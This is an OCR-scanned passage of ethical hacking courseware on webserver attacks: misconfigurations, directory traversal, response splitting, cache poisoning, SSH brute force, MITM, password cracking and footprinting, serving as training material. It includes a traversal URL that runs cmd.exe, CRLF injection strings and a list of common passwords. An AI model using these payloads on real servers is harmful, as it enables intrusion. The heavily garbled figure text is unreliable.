Module 12 Page 1619 Ethical Hacking and Countermeasures Copyright © by [G-Cfilcfl All Rights Reserved. Reproduction is Strictly Prohibited.
  21. 21. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers . In . |. '. '!= J_T-« ¢i= ;_2.- *t= :_’«. ‘ i_'A_i_l. »~i -m_i_i_f1; I ! .t_‘t= ._l i: l°)_i; I. _. _3i. '.t= 3.1.1]; l_l = -T httpd. conf file on an Apache server 5 isetnandler aer: ve: crs. ‘l: aJ: n: This configuration allows anyone to view the server status page, which contains detailed information about the current use of the web server, including information about the current hosts and requests being processed php. ini file This configuration gives verbose error messages U. -)1ii‘:2na. -I3xH'5‘i . _. "llv. :llIlllilll$il(%H>ll'A45Iififilflltlll'| il'£IIl$11iilll"VI'lfllai(-(ti ‘F5 Web Server Misconfiguration Example W11 Consider the httpd. conf file on an Apache server. FIGURE 12.5: httpd. conf file on an Apache server This configuration allows anyone to view the server status page that contains detailed information about the current use of the web server, including information about the current hosts and requests being processed. Consider another example, the php. ini file. FIGURE 12.6: php. inifi| e on an Apache server This configuration gives verbose error messages. Module 12 Page 1620 Ethical Hacking and Countermeasures Copyright © by [C-Cullllcll All Rights Reserved. Reproduction is Strictly Prohibited.
  22. 22. Ethical Hacking and Countermeasures Exam 31250 Certified Ethical Hacker Hacking Webservers Directory Traversal Attacks C E H arm-.4 um: Inn‘ in directory traversal attacks, attackers use . ./ (dot-dot-slash) sequence to access restricted directories outside of the web server root directory Attackers can use trial and error method to navigate the outside of root directory and access _ _ sensitive information in the system vuluii-Iudmuciun-at-boi. I vuium. Serial nr-mu in use-are: u oinawv rsic: 06/01/2010 11:31 AM 1,011 are 09/11/2010 06:43 In 0 iznnn http: //serve r. com/ s os/ nlloui onom oAurocxrc. ur . . o9/11/zoui atscm (DIR) CAVAL. INA_D|0ME cripts/ ..%5c. ./Wind 05/1|/ lI7ll'i03:l0PM oco«riia_svs ows/ System32/cm 313/'§3ll33Z$Z; '.‘2.’ " ""' “ Downloads «me? /c+dir+c: 322222223: :2: 2.. ... . as/ as/ Iain omuu «mu Snort in/ n/zoui as-. siuM on wuoows 09/15/I010 amam saau winmnum 7rii¢iiI sviuslbvvn u oirts) u,4s2.us. nom-um copyright 9 by B-Ciil. All Rights Reserved. Reproduction is Strictly Prohibited. (% Directory Traversal Attacks 4‘ ). fJ Web servers are designed in such a way that the public access is limited to some extent. through which attackers are able to access restricted directories and execute commands outside of the web server root directory by manipulating a URL. Attackers can use the trial-and-error method to navigate outside of the root directory and access sensitive information in the system. Volumemdrivec has rinlabel. VuluirruSurialNurnburr1 D4SE-QFEE ‘ Diletlnry nI(: D6/D2/2010 1l'§IAM 1.D2A. rrid 09/13/2010 0643 PM D llltdxl http: //server. i:om/ s as/21/zum 03.10 PM onurozxccmir cripts/ ..%5c. ./Wind 323132323 2:32.53 ‘°“" m. ‘.. “J§. ‘.'. ”;‘*”°“‘ ows/ Svstem32/cm fiiiiiifiifi 3Z; i§. i‘i2 fill‘: .‘§‘. ".“. ".2:2‘. “"“""""i’ d. exe? /c+dir+c: fiiiiiillfi 33333 fill’. 'p". '.. ‘.5.. m;. .. os/ zs/ zow one AM <DlR> Snort D9/18/2iJlD as scam (DIR) wiitoows 09/25/2010 02:03 PM 569.344 . 'llinDumD-exe 7 Filels) s7o, ;sa bytes 13 mils) 13.432.115.200 brie: rm FIGURE 12.7: Directory ‘Traversal Attacks Module 12 Page 1621 Ethical Hacking and Countermeasures Copyright ii‘ by All Rights Reserved. Reproduction is Strictly Piohibiteci.
  23. 23. Ethital Hacking and (ountermeasures Exam 31250 Certified Ethical Hacker Hacking Webservers HTTP Response Splitting Attack C E H «. .ui. .a um: I. .. I HTTP response splitting attack involves adding header response data into the input field so that the server split the response into two H‘r1'p/1.1 zoo ox res pon S65 Set—Cookie: author= Jason The attacker can control the first response to redirect user to a malicious website whereas the other responses will be discarded by web browser 5 ti’-'in9 3“ U101‘ = Setecookie: author= JasonTheHacker request . get: Paramet: er (AUTHOR_PA HTTP/1.1 200 OK RAM): Cookie cookie = new Cookie("author", author): cookie. setMAxAga(cookieExpirat ion); response. addCookie(cookie): HTTP/1.1 200 OK Copyright 0 by ES-Giil. All Rights Reserved. Reproduction is Srricuy Prohibited. » HTTP Response Splitting Attack _, An HTTP response attack is a web-based attack where a server is tricked by injecting new lines into response headers along with arbitrary code are some of the examples for this type of attacks. The attacker alters a single request to appear and be processed by the web server as two requests. The web server in turn responds to each request. This is accomplished by adding header response data into the input field. An attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header. The attacker can control the first response to redirect the user to a malicious website, whereas the other responses will be Module 12 Page 1622 Ethical Hacking and Countermeasures Copyright (O by All Rights Reserved. Reprodtirtion is Strictly Piohibited.
  24. 24. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers l | Il. 'l| .|O= iH>1'I| i HTTP/1.1 200 OK Set-Cookie: author= Jason Input = lasonTheI>iackerrnHTTP/1.1 200 0|(rn First Response (Controlled by Attacker) Strj-"19 3‘-‘H101’-' = Set-Cookie: author= JasonTheHacker C’ request . ge tParameter (AU1‘HOR_PA H1'l'P/ 1.1 200 OK '5 nan) , - O 0 cookie cookie - new 3 Cookie ( "author: author) ‘ second Response , . E cookie . set-. MaxAqe (cook: i.eExpi: i:at: Q ion) ’. ‘ HTTP/1.1 200 OK ‘n response . addcookie (cookie) : FIGURE 12.8: HTTP Response Splitting Attack Module 12 Page 1623 Ethical Hacking and Countermeasures Copyright © by [G-GUIIIIDII All Rights Reserved. Reproduction is Strictly Prohibited.
  25. 25. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers I L I . _ I‘ I l *3/: -i_o~ r= _Ii« -. '-__l= -‘ -’-)_I:1oIii'.1.iL: i _4_'. '. -_Ii«-l_t- * . “. . 94.. [ . 7 i we T i ill? ‘-. Hl(= li (C 1 ‘M : __, ,, __. -T‘-lI‘l: |i l :1k: in: ilt; pl: //juuvhoy. i:om/ indemhtrnl 5,_, ,Ve, cache _ Prarvie: mach: — Attacker sends request tn IEIIIWI page from cache , ,m, ,W, ,,, m .0 . ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . . ., ____ i http: //www. juggvboy. com/ wel Accept-Chzrset: Iso—Ba59—l, ‘,utf-5 557 MW / /lI4l¢W0V. com/ mi-rut-0 714'he= %nd%0aCanhent- mm xzovieodsooaseoaxoairrrv/ i.i9iz Normal response after ciumu the am in iuxzyhw-corri i< . ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . . .®. . (ome. php? Iang: <7php header["Location: ". $, GETl'naeE'l); ?> 02D|7XZDOKDd50a| ast- , Attzrkev sends malicious request Modrired xzn»ion. x1umairoasuoz00 ; _ gym . ... .m. , mu , .,, m,. , (4 . ..¢ 5) 9.10,. 5., ,. .am; MmM, ,a, ¢,, ,,. , , .,. I‘ . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .) in-um %1tJZi7%l7d'$Da€oriiuit- I rm xzorui/ nuuixoa-soaxa¢xon<nrrni >Anxk p. ..</ mmr> urrv/ i.i . < An attacker forces the N M M W M web server's cache to Attacker requests a iugzvbovxom . _ —. an G agairilo gerieratecacheentry H h , ‘ I I h ‘. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. Us [Sac U3 CM C htivI/ /lullvbwxom/ |ndel. htm| I . 77-: mood , .1-. .,, ,,, ... ,.. .,, .,, ,,, .,, ,,. , ; response of content and sends a Morin; /4.7 [en] : < . ... .. P.°. .. ... .3 . ... <. .© . ... . : ::; ::: I|: “m specially crafled __. ... . mukefiwu request, which will be Accept-(harset: Iso-8859-1,‘, uti-5 mm M. stored in cache -vwu. |IIl'Wouoni Anxnaplfi Poisoned Server Cache U. -i1ii‘:2r‘iI. -I31'H'5‘i . ,. 'llv. :llIiiiilil5ii(¥H>iI'AiiIii3!lI'l'l‘I'| ii'ZI"«$11il! ll"VI'lillai(-(‘i f'. _ ‘ Web Cache Poisoning Attack 'fi__ Web cache poisoning is an attack that is carried out in contrast to the reliability of an intermediate web cache source, in which honest content cached for a random URL is swapped with infected content. Users of the web cache source can unknowingly use the poisoned content instead of true and secured content when demanding the required URL through the web cache. An attacker forces the web server's cache to flush its actual cache content and sends a specially crafted request to store in cache. In the following diagram, the whole process of web cache poisoning is explained in detail with a step-by-step procedure. Module 12 Page 1624 Ethical Hacking and Countermeasures Copyright © by [C-Ciillllcll All Rights Reserved. Reproduction is Strictly Prohibited.
  26. 26. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers I’ " . ..h-‘‘. .— > I mum. up ‘ A“: l'lk'l' ‘ ‘ . m.. nu. -vI. mo. oulglnalhsmybvvvqgu ‘ 3” ‘”''l‘ I GEI’ Min: //Juggyboymnrn/ IndeI. htIn| §en, e( (“he M11!/ L1 Pflflflli | |°'¢l¢l|0 Attacker sends requesttaremovepegeirom cache H_, ,Iu"w°v_m, , httar: //www. [uuyboy. :om/ wol Ac: I9t-O1IIsIcisc>ll59-l. ‘.Iltl-8 ‘ normal response utter mme. php? |In'- Gnmwmavbayymml . . . . . . . f'. °.'. ".". ‘.‘? '.°. ‘.‘. d.'f. '? <7php header (‘tocatlonz ' . p: ::pnp7:m= xM9:tc:1i_i: :;; .mfl $_GEr['paga']); 7> Lug: : Dmandaunssnd . ozooxzoamod~xoaLm- 1 ‘ Amckerseuds imllclo-arequesl Moam. a:aa2oMon, as2au7xzno: mzu2in ‘ ® 9rszou: smusszoaar3sod9soncomem- l’ Lugihzaazozoaeassaxacmnuno ] l 'lype: %2Dten]hnnl9G£I!9I0.I9iDd9lI<| wrnI l mmq n; .</ mmpnny/1.1 i< Attacker getsllrat serve response _____' ‘ . . . . . .,-. ... ... . "°‘“’‘‘"l’°'V'‘°'“ ‘ Attacker requests a | uggybuy. com : l an . ... ..? §?3': P?. !€E'$! i‘£E? E'! ?£'! '!Y. ..i. ... . . ... .>1 mcndliuuyboymm/ snu. x.mmi 3 5 TM --and 3 urn»/1.1 Nost: test: |te. aun ; : '"P°W= °f I . ,,, ,., ,., m,. ,.. ,.. .., ”[. ,., I': l.1uE§C3 ; (wmum, ‘ 7 that polntsto , I _b . ;I. _ uttacklfs page‘ opt-Oilrnt: no-BIS9~1.'. utl-B “mm M" ‘ www. bIutvb0v. n'-I r. u.. .n. .w. ... u.. Poisoned Server Cache FIGURE 12.9: Web Cache Poisoning Attack Module 12 Page 1625 Ethlcal Hacklng and Countermeasures Copyright © by EC-Gflllllcil All Rights Reserved. Reproduction is Strictly Prohibited.
  27. 27. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers "iv Illlai-ni_ . _ Ii , _ ‘L. l ’ 3_Ll J _« ‘. :‘"*“‘ g I - Luv — ‘, !,‘*! aj" . -_x~ .1i_ui ‘ . . 7 . l 7 T T jv(§'»| A l ‘Ii-iilui H -‘lunvrqi D 0 Response »— . ... . . .‘. ‘.’? ‘. . '.‘. ’!‘? .". f‘. . . . . . . . . . . . . . . . . . . . .1, ,3 ( @ 5 1 ‘ 5}‘; <1 Requestforservice E « -‘~ . .®. .hvrsilrt! 'r! ;i9nm2ér! ;s9':1ié<s2HvS~ 1 <1 D —-i_. __. l ‘ — ‘ L ‘ < . ... ... ... ... ... ... ... ... .. . .§°€‘f'? f"‘E‘1‘? "?? lTf’f'? ‘1‘l‘? "F': ‘f€“! ‘F’}. ‘. -L) Attacker gets response or victim's request . < . ... ... ... ... ... ... ... ... ... ... ... . l i» * '. -Jg‘ii‘‘iiTd ‘lb’! : '1 ‘1. . 'll1.alllillzlil§Ci(= M=iI'i= i-Iiia-ll-i-llinilvirllfiiril-Iii‘! it-lfililitti-l HTTP Response Hijacking Ml” i_‘-r—“ HTTP response hijacking is accomplished with a response splitting request. In this attack, initially the attacker sends a response splitting request to the web server. The server splits the response into two and sends the first response to the attacker and the second response to the victim. On receiving the response from web server, the victim requests for service by giving credentials. At the same time, the attacker requests the index page. Then the web server sends the response of the victim's request to the attacker and the victim remains uninformed. The diagram that follows shows the step-by-step procedure of an HTTP response hijacking attack: Module 12 Page 1626 Ethical Hacking and Countermeasures Copyright © by [C-Culiiicll All Rights Reserved. Reproduction is Strictly Prohibited.
  28. 28. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers . ' i l ‘Ii-liluu ' -'1=wi= |i I Response splitting request . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .> I , first response ' ‘. ¥_’ll [ . nv . .. J Rlquestlnrservlca x r‘ . 'l"3‘, ".‘3’ °"" r'> ‘ 4 . ... ... ... ... ... ... ... ... .. . ?.“. .". ".'! r-. *:-:5!‘ Attadter request: In . .@. ':': r:i4': 'r: ':it!8!': i': !-r? :9{Efi'£1*sr: :15, Attaclrnrgets response of <. . . .‘4': ".‘f'l'. ‘.'. '.“. ‘!'. ‘.' . . . , . . . . . . . . . 1 7 FIGURE 12.10: HTTP Response Hijacking Module 12 Page 1627 Ethical Hacking and Countermeasures Copyright © by EC-Gflilllcil All Rights Reserved. Reproduction is Strictly Prohibited.
  29. 29. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers SSH Bruteforce Attack C EH r. .m. .r man u. .. SSH protocols are used to create an encrypted SSH tunnel between two hosts in order to transfer unencrypted data over an insecure network Attackers can bruteforce SSH login credentials to gain unauthorized access to a SSH tunnel SSH tunnels can be used to transmit malwares and other exploits to victims without being detected Mail Server q 2 . . , .. ... .. ..) Egg EDD Internet SSH Server Web Sewer A, ,,, .iga. ;., ,. 59,-Var User in . .. _ n S! & File Server Copyright © by E-Gfllcil. All Rights Reserved. Reproduction is Strictly Prohibited. fiil SSH Brute Force Attack %-Eb SSH protocols are used to create an encrypted SSH tunnel between two hosts in order to transfer unencrypted data over an insecure network. In order to conduct an attack on SSH, first the attacker scans the entire SSH server to identify the possible vulnerabilities. With the help of a brute force attack, the attacker gains the login credentials. Once the attacker gains the login credentials of SSH, he or she uses the same SSH tunnels to transmit malware and other exploits to victims without being detected. Mail Sewer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. ..) gt: A ----) 5 lmemeg 55” 5e"V°' Web 59|'V€f Application Server User _ 5 r_ . ‘V l. lL 7 File Server Attacker FIGURE 12.11: SSH Brute Force Attack Module 12 Page 1628 Ethical Hacking and Countermeasures Copyright © by [G-Gj All Rights Reserved. Reproduction is Strictly Prohibited.
  30. 30. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers ? _'l_t. =r. _i_-Jl. ,i+-i‘. __ . A A . ' l; «: L:«: 1 .13. . - , Man-in-the-Middle (MITM) attacks allow an attacker to access sensitive information by intercepting A and altering communications between an end-user and webservers Attacker acts as a proxy such that all the communication between the user and webserver passes through him Attacker stuffs the 3 cornrnunicahonto E steal session IDs U. -mu :2rlI. -I3t'H'5‘f . ,. ’‘llr~: llIilljin5‘i(? H>lI'AiiI: i3!lI'l'l‘l'| il'll"«$11il! il'‘VI'lillai(-('l ’ Man-in-the-Middle Attack ‘__-’ A man-in-the-middle attack is a method where an intruder intercepts or modifies the message being exchanged between the user and web server through eavesdropping or intruding into a connection. This allows an attacker to steal sensitive information of a user such as online banking details, user names, passwords, etc. transferred over the Internet to the web server. The attacker lures the victim to connect to the web server through by pretending to be a proxy. If the victim believes and agrees to the attacker’s request, then all the communication between the user and the web server passes through the attacker. Thus, the attacker can steal sensitive user information. »"' Ethical Hacking and Countermeasures Copyright © by [C-Cullllcll All Rights Reserved. Reproduction is Strictly Prohibited. Module 12 Page 1629
  31. 31. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers ‘ ’ rj User visits a website . Normal Traffic Attacker sniffs the communication to steal session IDs FIGURE 12.12: Man-in-the-Middle Attack Module 12 Page 1630 Ethical Hacking and Countermeasures Copyright © by All Rights Reserved. Reproduction is Strictly Prohibited.
  32. 32. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker "If-. i_T-in aw. ‘-. ' in; -_: r }‘=3~‘1»-‘Wl°)_1f-'. _i i«. ‘=_t~ -ii-I”_iLiJL: l ‘: I_: ‘. , u_ 1 .13. . - An attacker tries to exploit Many hacking attempts start / ' with cracking passwords and ":1-yr}: i I proves to the webserver that ‘. _. they are a valid user ‘. Attackers use different methods V _ _ such as social engineering, '- spoofing, phishing, using a Trojan Horse or virus, wiretapping, keystroke logging, etc. F‘: weaknesses to hack well-chosen passwords *¥¥-3|? The most common passwords found are password, root, administrator, admin, demo, test, guest, qwerty, pet names, etc. 1/ 7 i Attacker target mainly for: be r Web form authentication cracking ' r SSH Tunnels r FTP servers 7 SMTP sewers r Webshares V. -Jun inn. -I3xH'5‘f . ,. ".'iv. :‘IINNfi5Il(%H>II’H5HiH! lI'l-I‘i-fit-ZIIKF11ii! ii'IUI-iiii3i(-vi Web Server Password Cracking ‘*4 Most hacking starts with password cracking only. Once the password is cracked, the hacker can log in in to the network as an authorized person. Most of the common passwords found are password, root, administrator, admin, demo, test, guest, QWERTY, pet names, etc. Attackers use different methods such as social engineering, spoofing, phishing, using a Trojan horse or virus, wiretapping, keystroke logging, a brute force attack, a dictionary attack, etc. to crack passwords. Attackers mainly target: 8 Web form authentication cracking 6 SSH tunnels ‘:3 FTP servers 8 SMTP servers 6 Web shares Module 12 Page 1631 Ethical Hacking and Countermeasures Copyright © by [C-Clillllcll All Rights Reserved. Reproduction is Strictly Prohibited.
  33. 33. Ethical Hacking and Countermeasures Exam 31250 Certified Ethical Hacker Hacking Webservers Webserver Password Cracking CEH Techniques -_ I Passwords may be cracked manually or with automated tools such as Cain and Abel, Brutus, THC Hydra, etc. I Passwords can be cracked by using following techniques: I Dictionary Brute Force Attack The most time- consuming, but comprehensive way to crack a password. Every combination . . of character is tried humins o| -by until the password is automated tools broken. provided with dictionaries Copyright 0 by K-Ci“. All Rights Reserved. Reproduction is Strictiy Prohibited, ‘Q13. Web Server Password Cracking Techniques Passwords may be cracked manually or with automated tools such as Cain & Abel, Brutus, THC Hydra, etc. Attackers follow various techniques to crack the password: 0 : A common cracking method used by attackers is to guess passwords either by humans or by automated tools provided with dictionaries. Most people tend to use heir pets’ names, loved ones’ names, license plate numbers, dates of birth, or other weak pass words such as ”QWERTY, ” ”password, ” ”admin, " etc. so that they can remember them easily. The same thing allows the attacker to crack passwords by guessing. O : A dictionary attack is a method that has predefined words of various combinations, but this might also not be possible to be effective if the password consists of special characters and symbols, but compared to a brute force attack this is less time consuming. 0 : In the brute force method, all possible characters are tested, for example, uppercase from ”A to Z” or numbers from ”0 to 9" or lowercase "a to z. ” But this type of method is useful to identify one-word or two-word passwords. Whereas if a password consists of uppercase and lowercase letters and special characters, it might take months or years to crack the password, which is practically impossible. Module 12 Page 1632 Ethical Hacking and Countermeasures Copyright (0 by All Rights Reserved. Reproduction is Strictly Prohibited.
  34. 34. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers 6 Hybrid Attack: A hybrid attack is more powerful as it uses both a dictionary attack and brute force attack. It also consists of symbols and numbers. Password cracking becomes easier with this method. Module 12 Page 1633 Ethical Hacking and Countermeasures Copyright © by [G-Gciullcil All Rights Reserved. Reproduction is Strictly Prohibited.
  35. 35. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers W: ~i_.3 ~ L :1 : l_. l.: l'~l*= _l ljil 0 U 12 it ‘t= ._ivl_t-_: :1 Cl}: .I_ 1 .13. . - Vulnerabilities in web applications running on a webserver provide a broad attack path for webserver compromise ' u Se "Valid . . *5/an crosssife . File ’"/ E:-rd Inn“ an "I/ Eek’-"E 7 Pa Me: /II/ e 'mma"'d (X55141; "mi"! "MA ck d er/ ;.-or trio” Ana ad, ‘ : "Waring "Ls — }J 3 I s .1 ' - la 0 _ L I I ~1 / / 1. . 'l ‘ Q ‘Q4 - C15, 011;“ 9 «=51 in D "'/ ll-oi-s . ‘°’lery (C? "Wags, Athfks " Wfer ave (D415) 4” °'Vic¢ RF) Ana I Di’°¢'ta Ta cook, ” 4”"-‘ksmow ad‘ a‘ Trav. ,,; ,' "’P0rIng Note: For complete coverage of web application attacks refer to Module 13: Hacking Web Applications L‘) U. -igii : ii‘iI. -I3i'H'5‘f . ,. ’llv~: llIlllfilh5i1(¥H>II'AiiIil3!lI'l'l‘l'| il'ZI"«$11il! i1‘JI'lillai(-(ti ‘ g V p Web Application Attacks ; Vulnerabilities in web applications running on a web server provide a broad attack path for web server compromise. Directory Traversal Directory traversal is exploitation of HTTP through which attackers are able to access restricted directories and execute commands outside of the web server root directory by manipulating a URL. Parameter/ Form Tampering This type of tampering attack is intended to manipulate the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Cookie Tampering Cookie tampering is the method of poisoning or tampering with the cookie of the client. The phases where most of the attacks are done are when sending a cookie from the client side to the server. Persistent and non-persistent cookies can be modified by using different tools. Module 12 Page 1634 Ethical Hacking and Countermeasures Copyright © by [C-Ciililicll All Rights Reserved. Reproduction is Strictly Prohibited.
  36. 36. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers Command Injection Attacks J Command injection is an attacking method in which a hacker alters the content of the web page by using html code and by identifying the form fields that lack valid constraints. H Buffer Overflow Attacks Most web applications are designed to sustain some amount of data. if that amount is exceeded, the application may crash or may exhibit some other vulnerable behavior. The attacker uses this advantage and floods the applications with too much data, which in turn causes a buffer overflow attack. Cross-Site Scripting (XSS) Attacks Cross-site scripting is a method where an attacker injects HTML tags or scripts into a target website. $57‘ Denial-of-Service (Dos) Attack A denial-of-service attack is a form of attack method intended to terminate the operations of a website or a server and make it unavailable to access for intended users. Unvalidated Input and File injection Attacks l Unvalidated input and file injection attacks refer to the attacks carried by supplying an unvalidated input or by injecting files into a web application. ' " Cross-Site Request Forgery (CSRF) Attack U! The user's web browser is requested by a malicious web page to send requests to a malicious website where various vulnerable actions are performed, which are not intended by the user. This kind of attack is dangerous in the case of financial websites. SQL Injection Attacks SQL injection is a code injection technique that uses the security vulnerability of a database for attacks. The attacker injects malicious code into the strings that are later on passed on to SQL Server for execution. Session Hijacking Session hijacking is an attack where the attacker exploits, steals, predicts, and negotiates the real valid web session control mechanism to access the authenticated parts of a web application. Module 12 Page 1635 Ethical Hacking and Countermeasures Copyright © by [G-Gm All Rights Reserved. Reproduction is Strictly Prohibited.
  37. 37. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers ; w_iu -Ll. u. _l-. .« :1» v. » V «: l_= : 1 .13. . - Attack Methodology Webserver Attack Tools Webserver Concepts H-n-I 4 Patch Management counter- measures Webserver Security Tools Webserver Pen Testing L-I’-M 1'5 '1 . ,. -Ii V. JIlamitsiatam--I44rI: <am-1-[ti-tit-; .Itt1:itaii‘Auu Module 1-"low So far we have discussed web server concepts and various techniques used by the attacker to hack web server. Attackers usually hack a web server by following a procedural method. Now we will discuss the attack methodology used by attackers to compromise web servers. I Webserver Concepts Webserver Attacks _~u-— ’ Attack Methodology . Webserver Attack Tools , / A « ( a‘ Webserver Pen Testing 3 Webserver Security Tools / Patch Management Counter-measures This section provides insight into the attack methodology and tools that help at various stages of hacking. Module 12 Page 1636 Ethical Hacking and Countermeasures Copyright © by [C-Culillcll All Rights Reserved. Reproduction is Strictly Prohibited.
  38. 38. ,, ,«i_. c~ @ @ fl, Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers lil’§i_l°I~T1T—¥j. ‘."’? ¥_'I. ‘ _'«‘-_lVi. lit'= ._ir~l. i«,1 _i'i_i: :?)uu-f. i-i_i-:3 H _: ~j : 7 '1 .13. . _7 ' ca Information Webserver Mirroring Gathering Footprlntlng Website J Vulnerability Session Hacking Scanning Hijacking Webserver Passwords U. -i1ii‘:2i‘le. -I31'H'5‘i . ,. -flV. :1II: Il: litsiitaitaiuuiII: t=isii-i-iti-iit-iiltfiitrail‘! !--titlflita-I Web Server Attack Methodology Hacking a web server is accomplished in various stages. At each stage the attacker tries to gather more information about loopholes and tries to gain unauthorized access to the web server. The stages of web server attack methodology include: i / _ Information Gathering Every attacker tries to collect as much information as possible about the target web server. Once the information is gathered, he or she then analyzes the gathered information in order to find the security lapses in the current mechanism of the web server. i ‘,4 Web Server Footprinting The purpose of footprinting is to gather more information about security aspects of a web server with the help of tools or footprinting techniques. The main purpose is to know about its remote access capabilities, its ports and services, and the aspects of its security. Mirroring Website ~ Website mirroring is a method of copying a website and its content onto another server for offline browsing. Vulnerability Scanning Module 12 Page 1637 Ethical Hacking and Countermeasures Copyright © by [C-Culllicll All Rights Reserved. Reproduction is Strictly Prohibited.
  39. 39. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers Vulnerability scanning is a method of finding various vulnerabilities and misconfigurations of a web server. Vulnerability scanning is done with the help of various automated tools known as vulnerable scanners. _ Session Hijacking Session hijacking is possible once the current session of the client is identified. Complete control of the user session is taken over by the attacker by means of session hijacking. —i' Hacking Web Server Passwords it it alé ‘ll? , Attackers use various password cracking methods like brute force attacks, hybrid attacks, dictionary attacks, etc. and crack web server passwords. Module 12 Page 1638 Ethical Hacking and Countermeasures Copyright © by [G-Gulillcll All Rights Reserved. Reproduction is Strictly Prohibited.
  40. 40. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers - 4 W= J_T-rd =4-_2.' us: -_'-it _'4_ti‘r= ._u4_t-. . -. 'A_t= : i_i, un‘. .l-l. l- ': l‘. 'v"ri . _‘. _i_! _?-)_l_',1_1.t*-ll52fto)_i_l ‘—‘l'= li, i,l: ~)_i. "l, it3l . . . ... .- Information gathering involves collecting information about the . net targeted company Attackers search the Internet, newsgroups, bulletin boards, etc. for information about the company l— Attackers use Whois, Traceroute, Active Whois, etc. tools and _ y _ ‘/ HCIS i"f: '11atiorv r': :* -stay c: rn: "' query the Whois databases to get the details such as a domain name, an IP address, or an autonomous system number 1M “:1 V Note: For complete coverage of information gathering techniques refer to Module 02: Footprinting and Reconnaissance http: //www. whois. net V. -Jun : inI. -I3xli'5‘f . ,. ".'iv. :‘lINNfi5ii(%H>ll'H5KiH! lI'I-[Ul'| il'lIIl$1lil! illJI'lfllfli(-(ti r= :=~. Web Server Information L_J Gathering Every attacker before hacking first collects all the required information such as versions and technologies being used by the web server, etc. Attackers search the Internet, newsgroups, bulletin boards, etc. for information about the company. Most of the attackers’ time is spent in the phase of information gathering only. That's why information gathering is both an art as well as a science. There are many tools that can be used for information gathering or to get details such as a domain name, an IP address, or an autonomous system number. The tools include: 8 Whois Attack Methodology: ‘:9 Traceroute rd Active Whois ‘:9 Nmap 8 Angry IP Scanner :1 Netcat Whois Module 12 Page 1639 Ethical Hacking and Countermeasures Copyright © by [C-Cullllcll All Rights Reserved. Reproduction is Strictly Prohibited.
  41. 41. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers Source: httg: [[www. whois. net Whois allows you to perform a domain whois search and a whois IP lookup and search the whois database for relevant information on domain registration and availability. This can help provide insight into a domain's history and additional information. It can be used for performing a search to see who owns a domain name, how many pages from a site are listed with Google, or even search the Whois address listings for a website's owner. am. WHOIS information for ebay. com: DOlTlBl'i re ‘ ‘ 3-“ '4'] “ered . '.: ’_'i l"ia'i, ‘ 1 ‘gr dorailedi ' FIGURE 12.13: WHOIS Information Gathering Module 12 Page 1640 Ethical Hacking and Countermeasures Copyright © by It: -council All Rights Reserved. Reproduction is Strictly Prohibited.
  42. 42. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker W= J_T-rd =4-_2.' us: -_'-it _'4_t i ‘r= _u4_t-. . -. 'I_i= : l_i, u I -‘. l-l. l- I: rr-‘er _, l _« '. '!= J_? -in = :_: .' frag. =1’-I-i i: i_'-:1-. i.i§), i,tg l . . . '.. .‘. ‘-: " HETCRAFT Gather valuable system~| eve| information such as account details, operating system, software Search Web by Domain versions, server names, and database schema — xv: l 7 = details s-—--x : r|e cor": rt: .24». c*‘la‘lel: i;Vl I : . in)’ , :.. .:. ;~, _.-, V ni| :'c: Mt ia. .., ,~ Telnet a webserver to footprint a webserver and ---- v-«~ ~ » ~ gather information such as server name, server Results for microsoft type, operating systems, applications running, , , , _ etc. xne ~57: umin I Use tool such as ID Serve, httprecon, and Netcraft to perform footprinting ll5|lIlJ| l.hllt: lllEl. l:ll5lt: lE| I:l. l': lE| l$l. [|[ll5ll51lLfi h rtp: //toolbar. netcraft. cam V. -Jun : ine. -I3xli'5‘f . ,. 'llvdllllllilll5ii(%H>ll'AifIif3!lI'l'lll'| ii'lI"«$11il! il"VI'lfllni(-Pl ‘ Web Server Attack Methodology: Web server ~: ‘;; ;;____; ;;; ;§ Footprinting The purpose of footprinting is to gather account details, operating system and other software versions, server names, and database schema details and as much information as possible about security aspects of a target web server or network. The main purpose is to know about its remote access capabilities, open ports and services, and the security mechanisms implemented. Telnet a web server to footprint a web server and gather information such as server name, server type, operating systems, applications running, etc. Examples of tools used for performing footprinting include ID Serve, httprecon, Netcraft, etc. Netcraft Source: httpzfltoolba r. netcraft. com Netcraft is a tool used to determine the OSes in use by the target organization. It has already been discussed in detail in the Footprinting and Reconnaissance module. Module 12 Page 1641 Ethical Hacking and Countermeasures Copyright © by [C-Clillllcll All Rights Reserved. Reproduction is Strictly Prohibited.
